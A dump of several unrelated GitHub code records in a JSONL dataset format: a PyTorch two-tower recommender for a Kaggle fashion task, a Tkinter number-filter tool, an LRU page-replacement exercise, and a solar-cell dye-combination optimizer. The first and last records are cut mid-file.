self.customers_index_dict = customers_index_dict\n self.articles_index_dicts = articles_index_dicts\n\n def __len__(self):\n return len(self.customer_ids)\n\n def __getitem__(self, idx):\n customer_embed_id = self.customers_index_dict[self.customer_ids[idx]]\n customer_recent_purchase = self.articles_index_dicts[np.random.choice(self.purchases_ids[idx])]\n target_article_features_ids = self.articles_index_dicts[np.random.choice(self.purchases_ids[idx])]\n return torch.tensor([customer_embed_id, *customer_recent_purchase]).to(self.device), torch.tensor(target_article_features_ids).to(self.device)\n\n\nclass Encoder(nn.Module):\n '''Implements encoder to translate input embeddings into a meaningful representation'''\n def __init__(self, in_dim, out_dim, num_hidden_layers=1, hidden_layer_dim=32, activation=nn.LeakyReLU, device=None):\n super().__init__()\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu') if device is None else device\n linear_layers = nn.ModuleList()\n linear_layers.append(nn.Linear(in_dim, hidden_layer_dim))\n linear_layers.append(activation())\n for _ in range(num_hidden_layers):\n linear_layers.append(nn.Linear(hidden_layer_dim, hidden_layer_dim))\n linear_layers.append(activation())\n linear_layers.append(nn.Linear(hidden_layer_dim, out_dim))\n self.model = nn.Sequential(*linear_layers).to(self.device)\n\n def forward(self, x):\n return self.model(x)\n\n\nclass TwoTowerModel(nn.Module):\n '''Implements two tower contrastive learning'''\n def __init__(self, num_queries, num_features,\n query_embed_dim=8, input_embed_dim=36, representation_embed_dim=16, device=None):\n super().__init__()\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu') if device is None else device\n self.queries_embeddings = nn.Embedding(\n num_queries, query_embed_dim).to(self.device)\n self.objects_embeddings = nn.ModuleList(\n [nn.Embedding(num_features[feature], ARTICLE_FEATURES_SIZE[feature]) \\\n for feature in ARTICLE_FEATURES_LIST]).to(self.device)\n self.query_net = Encoder(\n query_embed_dim + input_embed_dim, representation_embed_dim, device=device).to(self.device)\n self.object_net = Encoder(\n input_embed_dim, representation_embed_dim, device=device).to(self.device)\n self.loss_criterion = nn.CrossEntropyLoss(reduction=\"mean\")\n\n def forward(self, contrastive_batch):\n queries, objects = contrastive_batch\n target_perm = torch.randperm(len(objects), requires_grad=False).to(self.device)\n objects = objects[target_perm]\n queries_id_latents = self.queries_embeddings(queries[:, 0])\n queries_purchase_latents = torch.cat(\n [self.objects_embeddings[i](queries[:, i+1]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1)\n queries_latents = self.query_net(torch.cat((queries_id_latents, queries_purchase_latents), dim=-1))\n objects_latents = self.object_net(torch.cat(\n [self.objects_embeddings[i](objects[:, i]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1))\n return torch.matmul(queries_latents, objects_latents.T), target_perm\n\n def predict(self, test_batch, topk):\n with torch.no_grad():\n queries, objects = test_batch\n queries_id_latents = self.queries_embeddings(queries[:, 0])\n queries_purchase_latents = torch.cat(\n [self.objects_embeddings[i](queries[:, i+1]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1)\n queries_latents = self.query_net(torch.cat((queries_id_latents, queries_purchase_latents), dim=-1))\n objects_latents = self.object_net(torch.cat(\n [self.objects_embeddings[i](objects[:, i]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1))\n logits = torch.matmul(queries_latents, objects_latents.T)\n return torch.topk(logits, topk, dim=1).indices\n\n def loss(self, logits, targets):\n return self.loss_criterion(logits, targets)\n\n\nclass TwoTowerTrainer:\n '''training loop of two tower model'''\n def __init__(self, model, train_dataloader, test_dataloader, epochs, learning_rate, experiment_name=\"two_tower\"):\n self.experiment_name = experiment_name\n self.save_model_path = os.path.join(\n os.environ[\"EXP_DIR\"], f\"{experiment_name}.pt\")\n self.save_plot_path = os.path.join(\n os.environ[\"EXP_DIR\"], f\"{experiment_name}_plot.jpg\")\n self.train_dataloader = train_dataloader\n self.test_dataloader = test_dataloader\n self.epochs = epochs\n self.lr = learning_rate\n self.model = model.train()\n self.opt = torch.optim.Adam(self.model.parameters(),\n lr=learning_rate)\n \n def train(self):\n train_it = 0\n # best_loss = float('inf')\n best_acc = -float('inf')\n losses, val_accs = [], []\n for epoch in tqdm(range(self.epochs)):\n print(f\"Run epoch {epoch}\")\n for batch in tqdm(self.train_dataloader):\n self.opt.zero_grad()\n logits, targets = self.model(batch)\n loss = self.model.loss(logits, targets)\n loss.backward()\n self.opt.step()\n # new_loss = sum(losses[-10:]) / len(losses[-10:])\n if train_it % 500 == 0:\n losses.append(loss.cpu().detach())\n print(f\"It {train_it}: Running Avg Loss: {sum(losses[-10:]) / len(losses[-10:])}\")\n val_acc = self.validate()\n print(f\"It {train_it}: Val Acc: {val_acc}\")\n val_accs.append(val_acc)\n if val_acc > best_acc:\n print(f\"saving checkpoint. new best acc: {val_acc}\")\n torch.save(self.model, self.save_model_path)\n best_acc = val_acc\n train_it += 1\n # log the loss training curves\n plt.figure(figsize=(15, 5))\n ax1 = plt.subplot(121)\n ax1.plot(losses)\n ax1.title.set_text(\"loss\")\n ax1 = plt.subplot(122)\n ax1.plot(val_accs)\n ax1.title.set_text(\"train acc\")\n plt.savefig(self.save_plot_path)\n plt.close()\n print(\"Done!\")\n\n def validate(self):\n test_batch = None\n correct = 0\n for batch in self.test_dataloader:\n test_batch = batch\n prediction = self.model.predict(test_batch, int(0.1 * len(test_batch[1])))\n for i in range(len(prediction)):\n correct += 1 if i in prediction[i] else 0\n return correct / len(prediction)\n\n\n\nif __name__ == \"__main__\":\n train = True\n test = True\n\n if train:\n # Init\n experiment_name = \"two_tower_symmetric_net\"\n print(f\"Initializing experiment: {experiment_name}\")\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n epochs = 10000\n val_size = 100\n learning_rate = 5e-4\n\n # Load in training data\n print(\"Loading in training data\")\n transactions_df = get_train_data(cutoff_date=None)\n purchases_df, customers_index_dict, articles_index_dict = get_customer_purchases(\n transactions_df, after=\"2020-08-22\")\n articles_df = pd.read_csv(os.path.join(os.environ[\"DATA_DIR\"], \"articles.csv\"), dtype={\"article_id\": str}).fillna(\"None\")\n articles_features_dicts, num_features, total_features = get_object_features(articles_df)\n article_index_dicts = prepare_object_embed_idxs(articles_df, articles_features_dicts)\n\n print(f\"# unique customer: {len(customers_index_dict)}\")\n print(f\"# unique articles: {len(articles_index_dict)}\")\n print(f\"# unique article features: {total_features}\")\n del transactions_df\n del articles_df\n del articles_features_dicts\n\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_customers_index_dict.pkl\"), 'wb') as f:\n pickle.dump(customers_index_dict, f)\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_articles_index_dicts.pkl\"), 'wb') as f:\n pickle.dump(article_index_dicts, f)\n\n training_purchases_df = purchases_df[:val_size]\n testing_purchases_df = purchases_df[:val_size]\n\n # Make dataset and dataloader\n print(\"Making purchases dataloader\")\n training_purchases_dataset = PurchasesDataset(\n training_purchases_df, customers_index_dict, article_index_dicts, device=device)\n training_purchases_dataloader = DataLoader(\n training_purchases_dataset, batch_size=64, drop_last=True, shuffle=True)\n testing_purchases_dataset = PurchasesDataset(\n testing_purchases_df, customers_index_dict, article_index_dicts, device=device)\n testing_purchases_dataloader = DataLoader(\n testing_purchases_dataset, batch_size=val_size, drop_last=True, shuffle=False)\n\n # Make model and trainer\n print(\"Making model and trainer\")\n two_tower_model = TwoTowerModel(\n len(customers_index_dict), num_features, device=device)\n count_parameters(two_tower_model)\n two_tower_trainer = TwoTowerTrainer(\n two_tower_model, training_purchases_dataloader, testing_purchases_dataloader, epochs, learning_rate, experiment_name)\n\n # Start training\n print(\"Starting training\")\n two_tower_trainer.train()\n\n if test:\n # Init\n experiment_name = \"two_tower_symmetric_net\"\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n # Load model and saved index dictionaries\n print(f\"Loading in model and index dictionaries\")\n model = torch.load(os.path.join(\n os.environ[\"EXP_DIR\"], f\"{experiment_name}.pt\"), map_location=device)\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_customers_index_dict.pkl\"), 'rb') as f:\n customers_index_dict = pickle.load(f)\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_articles_index_dicts.pkl\"), 'rb') as f:\n articles_index_dicts = pickle.load(f)\n\n # load in testing data\n print(\"Loading in testing data\")\n conditioning_transactions_df = get_train_data(cutoff_date=\"2020-09-15\")\n conditioning_purchases_df, _, _ = get_customer_purchases(\n conditioning_transactions_df, after=\"2020-08-22\")\n del conditioning_transactions_df\n\n target_transactions_df = get_train_data(cutoff_date=None)\n target_purchases_df, _, _ = get_customer_purchases(\n target_transactions_df, after=\"2020-09-16\")\n del target_transactions_df\n\n articles_df = pd.read_csv(os.path.join(os.environ[\"DATA_DIR\"], \"articles.csv\"), dtype={\"article_id\": str}).fillna(\"None\")\n\n # prepare testing data for prediction\n customers_input = []\n customer_ids = []\n for _, row in conditioning_purchases_df.iterrows():\n customer_ids.append(row[\"customer_id\"])\n customer_embed_id = customers_index_dict[row[\"customer_id\"]]\n customer_most_recent_purchase = articles_index_dicts[row[\"article_id\"][-1]]\n customers_input.append([customer_embed_id, *customer_most_recent_purchase])\n customers_input = torch.tensor(customers_input).to(device)\n print(f\"customers_input.shape: {customers_input.shape}\")\n\n articles_input = []\n article_ids = []\n for article_id in articles_df[\"article_id\"].to_numpy():\n if article_id in articles_index_dicts:\n article_ids.append(article_id)\n articles_input.append(articles_index_dicts[article_id])\n articles_input = torch.tensor(articles_input).to(device)\n print(f\"articles_input.shape: {articles_input.shape}\")\n\n # run predictions\n print(f\"running predictions\")\n print(f\"first and last customers: {customer_ids[0], customer_ids[-1]}\")\n submission = []\n pbar = tqdm(total=len(customer_ids))\n i = 0\n batch = 100\n while i < len(customer_ids):\n predictions = model.predict(\n (customers_input[i:i+batch], articles_input), 12)\n for j, prediction in enumerate(predictions):\n customer_prediction = [article_ids[p] for p in prediction]\n submission.append({\"customer_id\": customer_ids[i+j], \"prediction\": \" \".join(customer_prediction)})\n pbar.update(batch)\n i += batch\n pbar.close()\n\n fieldnames = ['customer_id', 'prediction']\n print(\"Writing predictions\")\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_submission.csv\"), 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(submission)","repo_name":"ShivinDass/recsys-kaggle-hnm","sub_path":"csci567/models/two_tower_model.py","file_name":"two_tower_model.py","file_ext":"py","file_size_in_byte":15806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29318260437","text":"# 创建两个不同的组\nfrom tkinter import *\nfrom tkinter import ttk\nimport os\n\npath = os.getcwd() + \"\\\\number.txt\"\n\nalist = []\n\nfor i in range(10):\n for j in range(i, 10):\n for k in range(j, 10):\n for l in range(k, 10):\n num = (str(i) + str(j) + str(k) + str(l))\n alist.append(num)\n\n\ndef callCheckbutton1():\n print(alist)\n\n\ndef callCheckbutton2():\n alist2 = []\n for i in alist:\n for j in i:\n if i.count(j) > 2:\n if i not in alist2:\n alist2.append(i)\n continue\n for i in alist2:\n alist.remove(i)\n print(alist)\n\n\ndef callCheckbutton3():\n alist2 = []\n for eachNumber in alist:\n for i, ele in enumerate(eachNumber):\n if i > 0 and ele == eachNumber[i - 1]:\n if eachNumber not in alist2:\n alist2.append(eachNumber)\n continue\n for i in alist2:\n alist.remove(i)\n print(alist)\n\n\ndef callCheckbutton4(event):\n var = comb.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4\")\n\n\ndef callCheckbutton4_2(event):\n var = comb2.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4_2\")\n\n\ndef callCheckbutton4_3(event):\n var = comb3.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4_3\")\n\n\ndef callCheckbutton4_4(event):\n var = comb4.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4_4\")\n\n\ndef callCheckbutton5(event):\n global alist\n var = comb5.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n print(alist2, var, \"callCheckbutton5\")\n alist = alist2\n\n\ndef callCheckbutton5_2(event):\n global alist\n var = comb5_2.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n print(alist2, var, \"callCheckbutton5_2\")\n alist = alist2\n\n\ndef callCheckbutton5_3(event):\n global alist\n var = comb5_3.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n print(alist2, var, \"callCheckbutton5_3\")\n alist = alist2\n\n\ndef callCheckbutton6(event):\n global alist\n var = comb6.get()\n alist2 = []\n for i in alist:\n if int(i[0]) + int(i[1]) + int(i[2]) + int(i[3]) < int(var):\n alist2.append(i)\n print(alist2, \"callCheckbutton6\")\n alist = alist2\n\n\ndef callCheckbutton7(event):\n global alist\n var = comb7.get()\n alist2 = []\n for i in alist:\n if int(i[0]) + int(i[1]) + int(i[2]) + int(i[3]) > int(var):\n alist2.append(i)\n print(alist2, \"callCheckbutton7\")\n alist = alist2\n\n\ndef callCheckbutton8(event):\n var = comb8.get()\n var1 = comb8_2.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8\")\n\n\ndef callCheckbutton8_3(event):\n var = comb8_3.get()\n var1 = comb8_4.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8_3\")\n\n\ndef callCheckbutton8_5(event):\n var = comb8_5.get()\n var1 = comb8_6.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8_5\")\n\n\ndef callCheckbutton8_7(event):\n var = comb8_7.get()\n var1 = comb8_8.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8_7\")\n\n\n# def callCheckbutton9():\n# global alist\n# var = t1.get()\n# a,b,c = var.split(',')\n# alist2 = []\n# for i in alist:\n# if a in i and b not in i and c not in i:\n# alist2.append(i)\n# if b in i and a not in i and c not in i:\n# alist2.append(i)\n# if c in i and a not in i and b not in i:\n# alist2.append(i)\n# alist = alist2\n# print(alist, \"callCheckbutton9\")\n\n\ndef callCheckbutton9(event):\n global alist\n a = comb9.get()\n b = comb9_2.get()\n c = comb9_3.get()\n\n alist2 = []\n for i in alist:\n if a in i and b not in i and c not in i:\n alist2.append(i)\n if b in i and a not in i and c not in i:\n alist2.append(i)\n if c in i and a not in i and b not in i:\n alist2.append(i)\n alist = alist2\n print(alist, \"callCheckbutton9\")\n\n\ndef run1():\n with open(path, \"w+\") as f:\n for i in alist:\n f.write(i)\n f.write(\"\\r\\n\")\n\n\nroot = Tk()\nroot.title('数字生成器')\n\nv = StringVar()\n\nvlang = IntVar()\nvos = IntVar()\nvlang.set(1) # 第一个组初始值为1\nvos.set(2) # 第一个组初始值为2\n# 创建两个组,不同的组,各个按钮互不影响。\nLabel(root, text=\"为避免发生错误,以下9个条件,请从上到下进行选择\").grid()\nLabel(root, text=\"\").grid()\nCheckbutton(root, text=\"1.A(0...9)/B(0...9)C(0...9)D(0...9);(四个数都是0-9中选择;)\", command=callCheckbutton1).grid()\nCheckbutton(root, text=\"2.A=B不等于C、D;(只允许两个数相同)\", command=callCheckbutton2).grid()\nCheckbutton(root, text=\"3.A不等于B不等于C不等于D(四个数不同)\", command=callCheckbutton3).grid()\n\nLabel(root, text=\"4.A\\B\\C\\D排除掉一个数,请输入你要排除的数字:\").grid()\ncomb = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb.grid()\ncomb.bind(\"<>\", callCheckbutton4)\n\ncomb2 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb2.grid()\ncomb2.bind(\"<>\", callCheckbutton4_2)\n\ncomb3 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb3.grid()\ncomb3.bind(\"<>\", callCheckbutton4_3)\n\ncomb4 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb4.grid()\ncomb4.bind(\"<>\", callCheckbutton4_4)\n\nLabel(root, text=\"5.A\\B\\C\\D中必有一个数,请输入必有的数字:\").grid()\ncomb5 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb5.grid()\ncomb5.bind(\"<>\", callCheckbutton5)\n\ncomb5_2 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb5_2.grid()\ncomb5_2.bind(\"<>\", callCheckbutton5_2)\n\ncomb5_3 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb5_3.grid()\ncomb5_3.bind(\"<>\", callCheckbutton5_3)\n\nLabel(root, text=\"6.四个数之和小于多少,请输入你希望小于的数字:\").grid()\ncomb6 = ttk.Combobox(root, values=[x for x in range(37)])\ncomb6.grid()\ncomb6.bind(\"<>\", callCheckbutton6)\n\nLabel(root, text=\"7.四个数之和大于多少,请输入你希望大于的数字:\").grid()\ncomb7 = ttk.Combobox(root, values=[x for x in range(37)])\ncomb7.grid()\ncomb7.bind(\"<>\", callCheckbutton7)\n\nLabel(root, text=\"8.A\\B\\C\\D不能同时存在的两个数,请输入你选择的第一个数:(每一排对应两个数字)\").grid()\ncomb8 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8.grid(row=19, column=0,sticky=W)\ncomb8_2 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_2.grid(row=19)\ncomb8_2.bind(\"<>\", callCheckbutton8)\nLabel(root, text=\"\").grid()\ncomb8_3 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_3.grid(row=20, column=0,sticky=W)\ncomb8_4 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_4.grid(row=20)\ncomb8_4.bind(\"<>\", callCheckbutton8_3)\nLabel(root, text=\"\").grid()\ncomb8_5 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_5.grid(row=21, column=0,sticky=W)\ncomb8_6 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_6.grid(row=21)\ncomb8_6.bind(\"<>\", callCheckbutton8_5)\nLabel(root, text=\"\").grid()\ncomb8_7 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_7.grid(row=22, column=0,sticky=W)\ncomb8_8 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_8.grid(row=22)\ncomb8_8.bind(\"<>\", callCheckbutton8_7)\n\n\nLabel(root, text=\"9.A\\B\\C\\D中存在下列数之一,请手动输入这三个数:\").grid()\n# t1 = Entry(root)\n# t1.grid(sticky=W)\ncomb9 = ttk.Combobox(root, width=14, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb9.grid(row=24, column=0,sticky=W)\ncomb9_2 = ttk.Combobox(root, width=14, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb9_2.grid(row=24)\ncomb9_3 = ttk.Combobox(root, width=14, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb9_3.grid(row=24,sticky=E)\n# Button(root, text='确定', command=callCheckbutton9).grid(row=24)\ncomb9_3.bind(\"<>\", callCheckbutton9)\n\nButton(root, text='点击查看结果', command=run1).grid()\n\nroot.mainloop()\n","repo_name":"xyh302/Tkinter","sub_path":"createNumber.py","file_name":"createNumber.py","file_ext":"py","file_size_in_byte":9449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20103961424","text":"\"\"\"wap to implement page replacement policy using\n(A) least recently used (LRU)\n(B) FIFO\n(C) Optimal\n\nmaintain a capacity \ninsert page one by one until the size of the frame reaches the max\nsimultaneously maintain the queue to maintain the \n\nwhoen the next page is not available and replacement is needed\"\"\"\n\n# input - 11212312341234512345665432154321321211\n\nprint('enter string')\ns = list(str(input()))\nprint(s)\nprint('enter size of the frame')\nfsize = int(input())\nframes = []\n\nprint('LRU')\n\nfor i in range(len(s)):\n for j in range(fsize):\n if j == len(frames): break\n if frames[j] == s[i]:\n del frames[j]\n break\n if fsize == len(frames): del frames[0]\n frames.append(s[i])\n print(frames)\n","repo_name":"maniksejwal/College","sub_path":"Sem 6/OS/6. page replacement.py","file_name":"6. page replacement.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22090730870","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nAuthor: Noah Bruno Manz\r\nAffiliation: New Mexico Institute of Mining and Technology, Department of Materials and Metallurgical Engineering\r\nCreated: Thu Jan 20 16:49:13 2022\r\n\r\nMS Thesis Reference:\r\nhttps://www.proquest.com/openview/5e34518343751bc814c51ea0720afd66/1?pq-origsite=gscholar&cbl=18750&diss=y\r\n\r\nLink to Data in Github Repository:\r\nhttps://github.com/noahmanz/Optimizing-the-Combination-of-Natural-Pigments-for-Co-Sensitization-of-Panchromatic-TiO2-DSSCs\r\n \r\n\"\"\"\r\n\r\n################### Import relevant libraries ###################\r\n\r\nimport numpy as np # Version 1.21.6 used\r\nfrom matplotlib import pyplot as plt # Version 3.5.1 used\r\nimport scipy.integrate as integrate # Version 1.7.3 used\r\nfrom scipy.stats import pearsonr # Version 1.7.3 used\r\nfrom scipy import interpolate # Version 1.7.3 used\r\nfrom tqdm import tqdm # Version 4.64.0 used\r\n\r\n\r\n\r\n\r\n################### Import solar irradiance data ###################\r\n\r\n# Import NREL data. Wavelength in nm, Irradiance in W*m^-2*nm^-1\r\n# Original data source: https://www.nrel.gov/grid/solar-resource/spectra-am1.5.html\r\nspectrum = np.genfromtxt('NREL_Solar_Irradiance.csv', delimiter = ',')\r\n\r\n# Generate wavelength domain for polynomial regression, 300-800 nm by 1 nm\r\nwavelength = np.linspace(340, 800, 461)\r\n\r\n# If you are dealing with different wavelength domains, adjust line 36 as follows:\r\n# wavelength = np.linspace(lower_bound, upper_bound, upper_bound - upper_bound + 1)\r\n# Note: Ensure that these wavelength limits match those contained in the UVVIS_Absorbance csv files\r\n\r\n\r\n# Calculate polynomial regression of the NREL data\r\nspectrum_regression = np.poly1d(np.polyfit(spectrum[: ,0], spectrum[:, 1], 6))\r\n\r\n# Calculate integral of regression for normalization\r\nspectrum_integral = integrate.trapezoid(spectrum_regression(wavelength), wavelength)\r\n\r\n# Normalized irradiance spectrum\r\nnormal_spectrum = spectrum_regression(wavelength) / spectrum_integral\r\n\r\n# Define function to plot solar irradiance spectrum if allow = True\r\ndef plotsolarirradiance(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(0)\r\n plt.plot(wavelength, spectrum_regression(wavelength), color = 'r', linewidth = 3, label = 'Regression')\r\n plt.scatter(spectrum[:, 0], spectrum[:, 1], marker = '.', label = 'NREL Data')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Spectral Irradiance (W*$m^{-2}$*$nm^{-1}$)')\r\n plt.title('AM1.5G Solar Irradiance Spectrum')\r\n plt.legend()\r\n #plt.savefig('Irradiance_Plot_300_800_nm', dpi = 500)\r\n\r\n if not allow: pass\r\n\r\n# Option to plot solar irradiance spectrum\r\nplotsolarirradiance(allow = True)\r\n\r\n\r\n\r\n\r\n################### Generate possible dye combinations ###################\r\n\r\n# Define number of points in volume fraction array. Determines resolution of the volume fraction meshgrid\r\n# Note: N is a user input. Increasing N results in more combinations being evaluated for fitment\r\nN = 11\r\n\r\n# Generate a volume fraction array based on N\r\nv = np.linspace(0, 1, N)\r\n\r\n# Print step size of volume fraction array in console\r\nprint(f\"Resolution of the volume fraction array is: {v[1] - v[0]} \\n\")\r\n\r\n# Generate meshgrid to make coordinate pairs representing all dye combinations\r\nv1, v2, v3, v4, v5, v6 = np.meshgrid(v, v, v, v, v, v, indexing = 'ij')\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), adjust line 82 as follows:\r\n# v1, v2, v3, v4, v5, v6, v7 = np.meshgrid(v, v, v, v, v, v, v, indexing = 'ij')\r\n\r\n# Calculate the sum of each coordinate pair at every point\r\nSum = v1 + v2 + v3 + v4 + v5 + v6\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), adjust line 88 as follows:\r\n# Sum = v1 + v2 + v3 + v4 + v5 + v6 + v7\r\n\r\n# Boolean logic to remove impossible combinations. Returns true only when Sum=1\r\ncondition = Sum == 1\r\n\r\n# Use boolean on meshgrid to only return coordinate pairs that sum to 1\r\nV1 = v1[condition]\r\nV2 = v2[condition]\r\nV3 = v3[condition]\r\nV4 = v4[condition]\r\nV5 = v5[condition]\r\nV6 = v6[condition]\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), add the following after V6:\r\n# V7 = v7[condition]\r\n\r\n# Print total number of dye combinations in console\r\nprint(f\"The total number of combinations is: {len(V1)} \\n\")\r\n\r\n\r\n\r\n\r\n################### Generate RBF Interpolation Functions ###################\r\n\r\n# Import volume fractions file corresponding to each analyzed dye combination\r\n# Note: This is a .csv file containing any dye combinations for which UV/VIS data was collected\r\n # Volume fractions of constituents should populate columns with each combination populating a new row\r\nvolume_fractions_w_header = np.genfromtxt('Emperical_Dye_Solutions_Volume_Fractions.csv', delimiter = ',')\r\n\r\n# Delete header and first column with variable labels\r\nvolume_fractions = np.delete(np.delete(volume_fractions_w_header, 0, 0), 0, 1)\r\n\r\n# Import the corresponding UV VIS [absorbance] data and set any negative values to zero\r\n# Note: This is the spectral UV/VIS data corresponding to each combination in \"Independent_Variables.csv\"\r\n # Each combination populates a column with wavelength values corresponding to individual rows\r\n # Either the anode adsorbed or bulk solution data can be passed as an argument here\r\ndata_w_header = np.clip(np.genfromtxt('UVVIS_Absorbance_Bulk_Solution.csv', delimiter = ','), 0, None)\r\n\r\n# Delete header row with labels\r\ndata = np.delete(data_w_header, 0, 0)\r\n\r\n# Break the volume fraction matrix into individual vectors corresponding to each constituent dye\r\nd1 = volume_fractions[:, 0]\r\nd2 = volume_fractions[:, 1]\r\nd3 = volume_fractions[:, 2]\r\nd4 = volume_fractions[:, 3]\r\nd5 = volume_fractions[:, 4]\r\nd6 = volume_fractions[:, 5]\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), add the following after d6:\r\n# d7 = volume_fractions[:, 6]\r\n \r\n# Create storage array to hold all RBF models\r\nRBF = []\r\n\r\n# Iterate through \"data\" and generate all 461 RBF models\r\nfor index, _ in enumerate(data):\r\n \r\n # Calculate an RBF interpolation of \"data\" for each wavelength\r\n interpolation = interpolate.Rbf(d1, d2, d3, d4, d5, d6, data[index, :], function = 'inverse')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 150 as follows:\r\n # interpolation = interpolate.Rbf(d1, d2, d3, d4, d5, d6, d7, data[index, :], function = 'inverse')\r\n \r\n # Append this result to the RBF list\r\n RBF.append(interpolation)\r\n \r\n\r\n# Define function F to return the RBF model over entire wavelength domain\r\n\r\ndef F(I1, I2, I3, I4, I5, I6):\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 161 as follows:\r\n # def F(I1, I2, I3, I4, I5, I6, I7):\r\n \r\n # Create temporary storage vector to hold the results of the RBF model\r\n temp_storage = []\r\n \r\n # Iterate through the UV/VIS dataset\r\n for index, _ in enumerate(data):\r\n \r\n # Evaluate the RBF model\r\n RBF_absorbance_value = RBF[index](I1, I2, I3, I4, I5, I6)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 173 as follows:\r\n # RBF_absorbance_value = RBF[index](I1, I2, I3, I4, I5, I6, I7)\r\n \r\n # Convert absorbance to LHE and append to storage vector\r\n # Note: LHE = 1 - Trans. --> LHE = 1 - 10 ^ -Abs.\r\n # Reference: http://www.rsc.org/suppdata/ee/c2/c2ee22854h/c2ee22854h.pdf\r\n temp_storage.append(1 - 10 ** (- RBF_absorbance_value))\r\n \r\n # Return the storage vector when F is called\r\n return np.array(temp_storage)\r\n\r\n\r\n\r\n\r\n################### Loop through all dye possible combinations ###################\r\n\r\n# Create empty array to store correlation fit data\r\ncorrelation = []\r\n \r\n# Create empty array to store fit data\r\nintegral = []\r\n \r\n# Create empty array to store fit data\r\ncovariance = []\r\n\r\n# Loop through all rows in volume fraction meshgrid\r\nfor f1, f2, f3, f4, f5, f6 in tqdm(zip(V1, V2, V3, V4, V5, V6), desc = \"Evaluating combinations\", total = len(V1)):\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 201 as follows:\r\n # for f1, f2, f3, f4, f5, f6, f7 in tqdm(zip(V1, V2, V3, V4, V5, V6, V7), desc = \"Evaluating combinations\", total = len(V1)):\r\n\r\n\r\n 